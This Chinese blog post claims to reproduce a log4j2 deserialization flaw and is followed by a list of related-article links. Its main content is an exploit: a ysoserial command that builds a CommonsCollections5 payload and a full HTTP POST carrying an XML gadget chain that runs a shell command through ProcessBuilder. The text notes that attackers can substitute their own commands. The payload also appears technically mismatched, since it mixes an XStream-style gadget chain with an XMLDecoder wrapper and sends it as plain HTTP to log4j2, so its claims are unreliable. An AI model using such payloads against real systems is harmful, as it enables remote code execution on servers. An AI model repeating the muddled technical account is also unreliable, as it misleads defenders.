log4j2反序列化漏洞复现

最新推荐文章于 2024-03-06 23:26:10 发布
最新推荐文章于 2024-03-06 23:26:10 发布
阅读量89 收藏
点赞数
分类专栏: 网络安全 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012491551/article/details/132707319
版权

log4j2反序列化漏洞是一种Java反序列化漏洞,攻击者可以利用此漏洞在受害服务器上执行任意代码。以下是一个简单的复现过程:

1. 构建恶意的序列化payload。可以使用ysoserial工具生成恶意的payload,如以下代码:

```
java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" > payload.bin
```

这个payload将在服务器上执行一个命令(touch /tmp/success),攻击者可以用自己的恶意代码替换它。

2. 将payload发送给目标服务器。攻击者可以使用各种方式将payload发送给目标服务器,例如使用curl或nc等工具。

3. 触发漏洞。攻击者可以构造一个HTTP请求,将payload发送到服务器上的Log4j2组件。例如:

```
POST / HTTP/1.1
Host: vulnerable_server.com
Content-Length: 686
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_79" class="java.beans.XMLDecoder">
  <object class="org.apache.logging.log4j.core.lookup.MainMapLookup">
    <map>
      <entry>
        <jdk.nashorn.internal.objects.NativeString>
          <flags>0</flags>
          <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
            <dataHandler>
              <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                <is class="javax.crypto.CipherInputStream">
                  <cipher class="javax.crypto.NullCipher">
                    <initialized>false</initialized>
                    <opmode>0</opmode>
                    <serviceIterator class="javax.imageio.spi.FilterIterator">
                      <iter class="javax.imageio.spi.FilterIterator">
                        <iter class="java.util.Collections$EmptyIterator"/>
                        <next class="java.lang.ProcessBuilder">
                          <command>
                            <string>touch</string><string>/tmp/success</string>
                          </command>
                          <redirectErrorStream>false</redirectErrorStream>
                        </next>
                      </iter>
                      <filter class="javax.imageio.ImageIO$ContainsFilter">
                        <method>
                          <class>java.lang.ProcessBuilder</class>
                          <name>start</name>
                          <parameter-types/>
                        </method>
                        <name>foo</name>
                      </filter>
                      <next class="string">foo</next>
                    </serviceIterator>
                    <lock/>
                  </cipher>
                  <input class="java.lang.ProcessBuilder$NullInputStream"/>
                  <ibuffer></ibuffer>
                  <done>false</done>
                  <ostart>0</ostart>
                  <ofinish>0</ofinish>
                  <closed>false</closed>
                </is>
                <consumed>false</consumed>
              </dataSource>
              <transferFlavors/>
            </dataHandler>
            <dataLen>0</dataLen>
          </value>
        </jdk.nashorn.internal.objects.NativeString>
        <string>foo</string>
      </entry>
    </map>
  </object>
</java>
```

这个请求将payload发送到一个Log4j2组件,触发反序列化漏洞。

4. 检查攻击是否成功。如果攻击成功,将在服务器上执行payload中的命令。可以检查/tmp目录是否存在success文件来验证攻击是否成功。

请注意,本示例中的payload非常简单,并且只是为了演示目的而使用的。攻击者可以使用更复杂的payload来执行更危险的操作,例如获取敏感数据或操纵服务器上的应用程序。因此,所有运行Log4j2的服务器都应该尽快升级到修复版本,以避免遭受攻击。

网络战争
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Log4j2核弹级漏洞线上修方案!
Rookie
12-11 361
一、漏洞描述2月9日晚,Apache Log4j2序列远程代码执行漏洞细节已被公开,Apache Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此...
log4j2序列漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-02 552
Log4j 是一个流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标。它采用了模块的架构,包含多个组件,如日志器(Logger)、输出器(Appender)、格式器(Layout)、过滤器(Filter)等。这些组件可以根据需要进行配置和组合,以满足各种日志记录需求。
Log4j2 序列漏洞原理与
FisrtBqy的博客
05-15 4082
Log4j2 RCE漏洞原理与
框架漏洞--->Log4j2 && Shiro1.2.4序列基础
最新发布
huohaowen的博客
03-06 1342
本文涉及log4j2 ,序列基础,Kerberos,Docker
Log4j2漏洞详解(自学)
m0_64481831的博客
03-05 1745
Log4j2是Apache下的流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标,被应用于业务系统开发,用于记录程序输入输出日志信息。Log4j2是Apache的日志框架,用来记录和管理日志信息的。Log4j2漏洞的原理是因为默认支持解析LDAP/RMI协议,且使用了占位符如{},并会解析里面的内容进行替换,所以攻击者就可以利用这一点构建特殊的恶意的占位符来进行攻击。
【Java小姿势】Log4j2漏洞的前世今生
行雨斋
12-20 2904
A.源起 2021年12月9日,各大公司都被一个重量级漏洞引爆了,该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应,加班加点修问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。 爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件,在java领域基本上是再常见运用不过的了,而这个漏洞可以
Java序列漏洞利用工具.zip
04-10
Java序列漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列序列过程中的安全问题。序列是将对象状态转换为可存储或传输的数据格式的过程,而序列则是将这些数据恢为原来的对象...
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:序列漏洞序列漏洞通常出在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro序列漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的序列漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 序列漏洞通常出在应用程序接收到...
【java安全】Log4j序列漏洞
leekos的博客,分享web安全相关知识~
08-18 2099
Log4j是Apache的开源项目,可以实对System.out等打印语句的替代,并且可以结合spring等项目,实把日志输出到控制台或文件等。本文介绍的Log4j序列漏洞都是由于未对传入的需要发序列的数据进行过滤,导致了恶意构造从而造成相关的序列漏洞。方法进行序列,并且整个步骤没有任何过滤,因此当我们传入的数据为恶意的cc链就可以触发序列漏洞了。我们运行一下这个类,它会监听本地的7777端口,然后我们需要将数据传递进去。这里和上面类似,也会将接受到的数据以。的构造方法,返回一个。
log4j2远程代码执行漏洞原理与漏洞(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
log4j之CVE-2017-5645
m_de_g的博客
07-14 1285
由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。可以看得到已成功执行。弹shell也能回来。
log4j2漏洞以及解决方案
学习不止境的博客
08-10 4426
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
log4j2漏洞与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
Log4j2漏洞(CVE-2021-44228)
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Apache Log4j 1.2.X序列漏洞(CVE-2019-17571)
weixin_44047654的博客
12-11 1514
Apache Log4j 1.2.X序列漏洞(CVE-2019-17571)
[20][03][81] Log4j 序列漏洞(CVE-2019-17571)
安全新司机
12-16 1461
文章目录1. 组件基本信息1.1 pom 信息1.2 影响版本1.3 漏洞场景2. 漏洞2.1 引入pom组件2.2 新建 log4j.properties2.3 Log4jLeak 代码2.4 下载 ysoserial.jar2.5 生成 playload2.5 启动程序3. 漏洞源码分析3.1 SimpleSocketServer 类3.2 SocketNode 类4. 射到外网 1. 组件基本信息 1.1 pom 信息 <groupId>log4j</groupId> &
log4j 2序列漏洞防御
08-01
引用[1]: Log4j2是一个开源的日志记录库,可以在多种编程语言中使用。然而,在Log4j2的2.8.2版本之前存在一个序列漏洞。[3]这个漏洞的原理是攻击者可以通过构造恶意的日志消息来触发序列操作,从而执行任意代码。[1]为了防止这个漏洞的利用,可以采取以下措施。 首先,升级到Log4j2的2.8.2版本或更高版本。[1]这个版本修序列漏洞,并提供了更安全的实。 其次,可以禁用Log4j2的JNDI功能,因为这是漏洞利用的一种常见方式。[2]可以通过设置系统属性"com.sun.jndi.ldap.object.trustURLCodebase"为"false"来禁用JNDI功能。 此外,还可以使用安全的配置来限制日志消息的内容。[1]可以对日志消息进行过滤,只允许特定的字符或字符串,以防止恶意代码的注入。 最后,定期检查Log4j2的官方网站或邮件列表,以获取最新的安全更新和建议。[1]及时更新Log4j2可以帮助保护系统免受已知漏洞的攻击。 综上所述,为了防御Log4j2的序列漏洞,建议升级到最新版本、禁用JNDI功能、使用安全的配置和及时更新。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值